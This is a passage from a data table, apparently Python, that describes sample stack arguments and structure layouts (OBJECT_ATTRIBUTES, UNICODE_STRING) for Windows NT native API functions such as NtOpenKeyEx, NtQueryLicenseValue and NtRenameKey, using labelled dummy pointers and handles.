\"0x00000000\",\r\n \"fieldComment\": \"No information yet\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenKeyEx\": {\r\n \"ntFunc\": \"NtOpenKeyEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"OpenOptions = 0 (default options)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct99\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"DesiredAccess = KEY_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct99\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0070\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenKeyedEvent\": {\r\n \"ntFunc\": \"NtOpenKeyedEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct100\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0003\",\r\n \"additionalComment\": \"DesiredAccess = EVENT_ALL_ACCESS\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE KeyedEventHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct100\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0080\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenRegistryTransaction\": {\r\n \"ntFunc\": \"NtOpenRegistryTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct101\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F003F\",\r\n \"additionalComment\": \"DesiredAccess = TRANSACTION_ALL_ACCESS\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to HANDLE RegistryHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct101\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0090\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtPlugPlayControl\": {\r\n \"ntFunc\": \"NtPlugPlayControl\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"BufferSize = 4096 bytes (typical size for device info)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Buffer = None (no buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000000D\",\r\n \"additionalComment\": \"Class = PlugPlayControlEnumerateDevice (example class value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPssCaptureVaSpaceBulk\": {\r\n \"ntFunc\": \"NtPssCaptureVaSpaceBulk\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to SIZE_T ReturnLength (dummy pointer, may be None if not needed)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00002000\",\r\n \"additionalComment\": \"Length (SIZE_T), e.g., 8 KB\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to output Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00405000\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (PVOID), e.g., start of region\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryAuxiliaryCounterFrequency\": {\r\n \"ntFunc\": \"NtQueryAuxiliaryCounterFrequency\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONGLONG lpAuxiliaryCounterFrequency (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x000F4240\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryDebugFilterState\": {\r\n \"ntFunc\": \"NtQueryDebugFilterState\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Level (e.g., 2 = warning)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Component (e.g., 1 = default component)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationByName\": {\r\n \"ntFunc\": \"NtQueryInformationByName\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000005\",\r\n \"additionalComment\": \"FILE_INFORMATION_CLASS FileInformationClass (e.g., FileStandardInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG Length (256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to FileInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00406000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to IO_STATUS_BLOCK (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct102\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct102\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name specified)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryInstallUILanguage\": {\r\n \"ntFunc\": \"NtQueryInstallUILanguage\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG LanguageId (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000409\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryLicenseValue\": {\r\n \"ntFunc\": \"NtQueryLicenseValue\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnedLength (dummy pointer, will receive length of value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG Length (buffer size in bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer (dummy pointer, will receive value data)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG Type (dummy pointer, will receive value type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Name (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct103\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the license value name.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct103\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0100\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryOpenSubKeys\": {\r\n \"ntFunc\": \"NtQueryOpenSubKeys\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG HandleCount (dummy pointer, will receive count)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000002\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES TargetKey (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct104\",\r\n \"structureValueExpectations\": \"OBJECT_ATTRIBUTES describing the registry key.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct104\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0110\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryOpenSubKeysEx\": {\r\n \"ntFunc\": \"NtQueryOpenSubKeysEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG ResultLength (dummy pointer, will receive length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to buffer (dummy pointer, will receive subkey info)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG BufferLength (size of buffer in bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES TargetKey (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct105\",\r\n \"structureValueExpectations\": \"OBJECT_ATTRIBUTES describing the registry key.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct105\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0120\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryPortInformationProcess\": {\r\n \"ntFunc\": \"NtQueryPortInformationProcess\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySecurityPolicy\": {\r\n \"ntFunc\": \"NtQuerySecurityPolicy\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to ULONG Subsystem (dummy pointer, will receive subsystem value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to BOOLEAN Enabled (dummy pointer, will receive enabled flag)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x01\"\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to ULONG Unknown (dummy pointer, will receive unknown value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Policy (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct106\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the policy name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubCategory (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct107\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the subcategory.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING Category (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct108\",\r\n \"structureValueExpectations\": \"UNICODE_STRING describing the category.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct106\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x000c\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0130\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct107\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0008\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0140\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct108\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x000a\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0150\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryWnfStateNameInformation\": {\r\n \"ntFunc\": \"NtQueryWnfStateNameInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG InfoBufferSize (typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to InfoBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID ExplicitScope (None, typical usage)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG NameInfoClass (WnfStateNameInfoBasic, typical usage)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xa3bcdef0\",\r\n \"additionalComment\": \"PCWNF_STATE_NAME StateName (example state name value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRenameKey\": {\r\n \"ntFunc\": \"NtRenameKey\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ReplacementName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct109\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the new key name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE KeyHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct109\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0010\",\r\n \"fieldComment\": \"Length in bytes of the string\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"Maximum length in bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0020\",\r\n \"fieldComment\": \"Pointer to wide string buffer (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtResumeProcess\": {\r\n \"ntFunc\": \"NtResumeProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE hProcess (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n 